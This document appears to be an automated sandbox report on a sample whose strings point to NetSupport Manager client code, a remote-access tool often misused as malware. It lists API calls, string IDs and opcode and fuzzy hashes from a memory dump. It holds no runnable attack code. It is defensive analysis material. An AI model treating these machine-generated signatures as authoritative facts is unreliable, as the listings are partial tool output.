                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeavewsprintf
                                                                                      • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                      • API String ID: 3005300677-3496508882
                                                                                      • Opcode ID: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                      • Instruction ID: 2680b2d19a9bdf8eb0956d8c99ae1cac6e929f7b4449284ea49473897193c40b
                                                                                      • Opcode Fuzzy Hash: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                      • Instruction Fuzzy Hash: 9EB1A375E0022A9FDB14DF65CC50FAAB7B9AF49708F4041DCE909A7241EB71A981CF62
APIs
• IsWindow.USER32(?), ref: 11047211
• _malloc.LIBCMT ref: 110472AD
• _memmove.LIBCMT ref: 11047312
• SendMessageTimeoutA.USER32(?,0000004A,0002046E,00000005,00000002,00002710,?), ref: 11047372
• _free.LIBCMT ref: 11047379
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
  • Part of subcall function 11043870: _free.LIBCMT ref: 11043907
  • Part of subcall function 11043870: _free.LIBCMT ref: 11043927
  • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043955
  • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043992
  • Part of subcall function 11043870: _malloc.LIBCMT ref: 110439CC
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
• String ID: IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
• API String ID: 3960737985-1318765656
• Opcode ID: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
• Instruction ID: e7dd2455d00588b8b0596ee18c4208b20e6f9302996f578dcf6f33cfb97cf12a
• Opcode Fuzzy Hash: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
• Instruction Fuzzy Hash: 18C1A374E0064A9FDB04DFE4C8D0EEEF7B5BF88308F208168D519AB295DB70A945CB90
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 1102D1C0
  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
  • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
• _memmove.LIBCMT ref: 1102D24A
• _memmove.LIBCMT ref: 1102D26E
• _memmove.LIBCMT ref: 1102D2A8
• _memmove.LIBCMT ref: 1102D2C4
• std::exception::exception.LIBCMT ref: 1102D30E
• __CxxThrowException@8.LIBCMT ref: 1102D323
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
• String ID: deque<T> too long
• API String ID: 827257264-309773918
• Opcode ID: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
• Instruction ID: ae58a47b93f5c67beecf59276473b3909c5d487f19c470db74dff325715f4f31
• Opcode Fuzzy Hash: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
• Instruction Fuzzy Hash: DD41A476E00105ABDB04CE68CC81AEEB7FAAF94324F59C669DC09DB344E675EE05C790
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: __fread_nolock_fseek$_free_malloc_memset
• String ID: PCIR
• API String ID: 2419779768-1011558323
• Opcode ID: 81c3817886dc5dbe589c173359df18430558f154d2dd439929bf4d11460d0680
• Instruction ID: 1ccd7dea2f775c367685aa3e1c73f4b59a6156879e869ee7e214f681fe7cb03c
• Opcode Fuzzy Hash: 81c3817886dc5dbe589c173359df18430558f154d2dd439929bf4d11460d0680
• Instruction Fuzzy Hash: A94106B1F01318ABEB10CFA4DD41BDEB7BEEF81308F104069EC09AB240DA72A901C795
APIs
• SetPropA.USER32(?,?), ref: 1101556F
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
  • Part of subcall function 11015290: BeginPaint.USER32(?,?), ref: 110152BF
  • Part of subcall function 11015290: GetWindowRect.USER32(?,?), ref: 110152D7
  • Part of subcall function 11015290: _memset.LIBCMT ref: 110152E5
  • Part of subcall function 11015290: CreateFontIndirectA.GDI32(?), ref: 11015301
  • Part of subcall function 11015290: SelectObject.GDI32(00000000,00000000), ref: 11015315
  • Part of subcall function 11015290: SetBkMode.GDI32(00000000,00000001), ref: 11015320
  • Part of subcall function 11015290: BeginPath.GDI32(00000000), ref: 1101532D
  • Part of subcall function 11015290: TextOutA.GDI32(00000000,00000000,00000000), ref: 11015350
  • Part of subcall function 11015290: EndPath.GDI32(00000000), ref: 11015357
  • Part of subcall function 11015290: PathToRegion.GDI32(00000000), ref: 1101535E
  • Part of subcall function 11015290: CreateSolidBrush.GDI32(?), ref: 11015370
  • Part of subcall function 11015290: CreateSolidBrush.GDI32(?), ref: 11015386
  • Part of subcall function 11015290: CreatePen.GDI32(00000000,00000002,?), ref: 110153A0
  • Part of subcall function 11015290: SelectObject.GDI32(00000000,00000000), ref: 110153AE
  • Part of subcall function 11015290: SelectObject.GDI32(00000000,?), ref: 110153BE
  • Part of subcall function 11015290: GetRgnBox.GDI32(00000000,?), ref: 110153CB
• GetPropA.USER32(?), ref: 1101557E
• wsprintfA.USER32 ref: 110155B3
• RemovePropA.USER32(?), ref: 110155E8
• DefWindowProcA.USER32(?,?,?,?), ref: 11015611
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Create$ObjectPathPropSelect$BeginBrushSolidWindowwsprintf$ErrorExitFontIndirectLastMessageModePaintProcProcessRectRegionRemoveText_memset
• String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
• API String ID: 1924375018-841114059
• Opcode ID: 349e3198e4ee11d8f994cce4f4d7fe91b877becd306935b01eaf7a21f5783bae
• Instruction ID: fc00b609a2f261b647cf9ab1963ef075e81928135c8218ba30019119ab5d925d
• Opcode Fuzzy Hash: 349e3198e4ee11d8f994cce4f4d7fe91b877becd306935b01eaf7a21f5783bae
• Instruction Fuzzy Hash: 1131E775E01029ABD714DFA4DC80FBEB379EF4A309F04406AF51A9F148EA7A9940CB71
                                                                                      APIs
                                                                                      • GetMenuItemCount.USER32(?), ref: 1100519E
                                                                                      • _memset.LIBCMT ref: 110051C0
                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 110051D4
                                                                                      • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005231
                                                                                      • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005247
                                                                                      • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005268
                                                                                      • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005294
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                      • String ID: 0
                                                                                      • API String ID: 2755257978-4108050209
                                                                                      • Opcode ID: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                      • Instruction ID: ff6163613c0a8cbc830ef1528835912891ededd95cc8b4eaa22ca2fcf9c2cdf5
                                                                                      • Opcode Fuzzy Hash: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                      • Instruction Fuzzy Hash: 71318E70D11219ABEB01DFA4D885BEEBBFCEF46758F008059F951E6240E7759944CB60
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 1101D1E0
                                                                                      • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D1FA
                                                                                      • _memset.LIBCMT ref: 1101D20A
                                                                                      • RegisterClassExA.USER32(?), ref: 1101D24B
                                                                                      • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11194244,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D27E
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 1101D28B
                                                                                      • DestroyWindow.USER32(00000000), ref: 1101D292
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                      • String ID: NSMChatSizeWnd
                                                                                      • API String ID: 2883038198-4119039562
                                                                                      • Opcode ID: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                      • Instruction ID: df00defde950c6a972f57fa33671139d82de9fa74eae4c6bde258e6239c9b3d1
                                                                                      • Opcode Fuzzy Hash: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                      • Instruction Fuzzy Hash: C7314DB5D0021DAFDB10DFA5DD84BEEF7B8EB44628F20012EE925B7240D735A905CB64
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 11105531
                                                                                      • EnterCriticalSection.KERNEL32 ref: 11105548
                                                                                      • GetTickCount.KERNEL32 ref: 1110554E
                                                                                      • GetTickCount.KERNEL32 ref: 111055EB
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C), ref: 111055F8
                                                                                      Strings
                                                                                      • , xrefs: 11105589
                                                                                      • Warning. simap lock held for %d ms, xrefs: 11105609
                                                                                      • Warning. took %d ms to get simap lock, xrefs: 1110555F
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$CriticalSection$EnterLeave
                                                                                      • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$
                                                                                      • API String ID: 956672424-3390415482
                                                                                      • Opcode ID: c1740793aff0a857699f8c8da11d168052976df0f5bdff16eb1b228a2dd960db
                                                                                      • Instruction ID: 36f89d150e27e685f8f970f5604c93a837ba150e33a3fa1efe54dd65d22fc2b8
                                                                                      • Opcode Fuzzy Hash: c1740793aff0a857699f8c8da11d168052976df0f5bdff16eb1b228a2dd960db
                                                                                      • Instruction Fuzzy Hash: BA310475D042999FE315CF64C984F5AFBE6EB08328F154265E866EB290D731EC00CB90
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 1103D18F
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000125), ref: 1103D1BD
                                                                                      • CloseHandle.KERNEL32(?), ref: 1103D25C
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1103D26C
                                                                                      • CloseHandle.KERNEL32(?), ref: 1103D279
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$FileModuleNameObjectSingleWait_memset
                                                                                      • String ID: /247$" /a$RunAnnot
                                                                                      • API String ID: 2581068044-4059077130
                                                                                      • Opcode ID: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                      • Instruction ID: dc76f3c11fb5ad4c0452055a60ef983052eda761819ccc7684b04031b26646f7
                                                                                      • Opcode Fuzzy Hash: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                      • Instruction Fuzzy Hash: 4541C030A04319AFEB11DFA4CC84FDDB7B9EB48704F1080A5E6589B284DB71E944CF90
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,?,?,?,?,1102E011,?,?,11194244,Trying to get mac addr for %u.%u.%u.%u,?,000000FF,?,?), ref: 1112B295
                                                                                      • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1112B2AE
                                                                                      • wsprintfA.USER32 ref: 1112B2FB
                                                                                      • wsprintfA.USER32 ref: 1112B313
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,1102E011), ref: 1112B328
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Librarywsprintf$AddressFreeLoadProc
                                                                                      • String ID: %02x$IPHLPAPI.DLL$SendARP
                                                                                      • API String ID: 435568443-4085816232
                                                                                      • Opcode ID: 059c12f073bdf147a91715eca9bcb01dfedc32bce9f3742e1109da8ce792d870
                                                                                      • Instruction ID: 7d96227945af9bb0c0fa81f266df54215dce15e5fec16fb5673a6d202f8b9dc6
                                                                                      • Opcode Fuzzy Hash: 059c12f073bdf147a91715eca9bcb01dfedc32bce9f3742e1109da8ce792d870
                                                                                      • Instruction Fuzzy Hash: 87216D75E001299BCB14CFA6CD85AEEFBB8FF8D614F550118EC14A3300E635AE05CBA4
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 11037267
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      • _free.LIBCMT ref: 1103728F
                                                                                      • _strncpy.LIBCMT ref: 110372BB
                                                                                      • _strncpy.LIBCMT ref: 110372F8
                                                                                      • _malloc.LIBCMT ref: 11037332
                                                                                      • _strncpy.LIBCMT ref: 11037343
                                                                                      • _strncpy.LIBCMT ref: 11037383
                                                                                      • _malloc.LIBCMT ref: 110373B6
                                                                                      • _strncpy.LIBCMT ref: 110373CC
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strncpy$_free_malloc$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 1102513549-0
                                                                                      • Opcode ID: 49d6ee828f48e7441e9132c75d4151723e4ca8f50ebe71d103648970c0ae2386
                                                                                      • Instruction ID: 5b3f98012d02b14c7d353fffc6174d10c2b98c6782d71c8fdc241da8d4ec8af6
                                                                                      • Opcode Fuzzy Hash: 49d6ee828f48e7441e9132c75d4151723e4ca8f50ebe71d103648970c0ae2386
                                                                                      • Instruction Fuzzy Hash: 5A5152B5D04225AFDB20CF74CD84BCAFBECAF15348F004595998997240EBB5AA94CFE1
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,11195920), ref: 1100D3A4
                                                                                      • GetProcAddress.KERNEL32(00000000,11195910), ref: 1100D3B8
                                                                                      • GetProcAddress.KERNEL32(00000000,11195900), ref: 1100D3CD
                                                                                      • GetProcAddress.KERNEL32(00000000,111958F0), ref: 1100D3E1
                                                                                      • GetProcAddress.KERNEL32(00000000,111958E4), ref: 1100D3F5
                                                                                      • GetProcAddress.KERNEL32(00000000,111958C4), ref: 1100D40A
                                                                                      • GetProcAddress.KERNEL32(00000000,111958A4), ref: 1100D41E
                                                                                      • GetProcAddress.KERNEL32(00000000,11195894), ref: 1100D432
                                                                                      • GetProcAddress.KERNEL32(00000000,11195884), ref: 1100D447
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID:
                                                                                      • API String ID: 190572456-0
                                                                                      • Opcode ID: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                      • Instruction ID: 496fda0e4c6754f74ae7accc981fa1b683a1531f66a76574b420f2493807621a
                                                                                      • Opcode Fuzzy Hash: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                      • Instruction Fuzzy Hash: BC318A719222349FE756CBE5CCD5B7AFFE9A748B19B00417AD42083248E7B46840CF90
APIs
• GetStockObject.GDI32(00000007), ref: 11113167
• SelectObject.GDI32(00000000,00000000), ref: 11113176
• SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11119DB4,?,00000001,00000001,00000000,1111E6D7,00000000,?,00000000), ref: 11113181
• GetStockObject.GDI32(00000000), ref: 11113189
• SelectObject.GDI32(?,00000000), ref: 11113192
• GetStockObject.GDI32(0000000D), ref: 11113196
• SelectObject.GDI32(00000000,00000000), ref: 1111319F
• SelectClipRgn.GDI32(00000000,00000000), ref: 111131B3
• SelectClipRgn.GDI32(?,?), ref: 111131D5
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Object$Select$Stock$Clip$Brush
• String ID:
• API String ID: 2690518013-0
• Opcode ID: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
• Instruction ID: 6254f714a47a8412abfa64db40702d153c74c152478294c48941108971bda100
• Opcode Fuzzy Hash: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
• Instruction Fuzzy Hash: CC114C71604214AFE320EFA9CC88F56F7E8AF48714F114529E698DB294C774E840CF60
APIs
  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(111ED708,4012B9B4,1110EDDD,00000000,00000000,00000000,E8111B5E,111825D3,000000FF,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000), ref: 1107602E
  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(0000000C,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4012B9B4,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 11076097
  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(00000024,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4012B9B4,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 1107609D
  • Part of subcall function 11075FE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4012B9B4,00000000,00000001,00000000,00000000), ref: 110760A7
  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004D0,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4012B9B4,00000000,00000001,00000000,00000000), ref: 110760FC
  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004F8,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4012B9B4,00000000,00000001,00000000,00000000), ref: 11076105
• LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
• GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
• SetLastError.KERNEL32(00000078), ref: 110575F4
• FreeLibrary.KERNEL32(00000000), ref: 110575FF
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
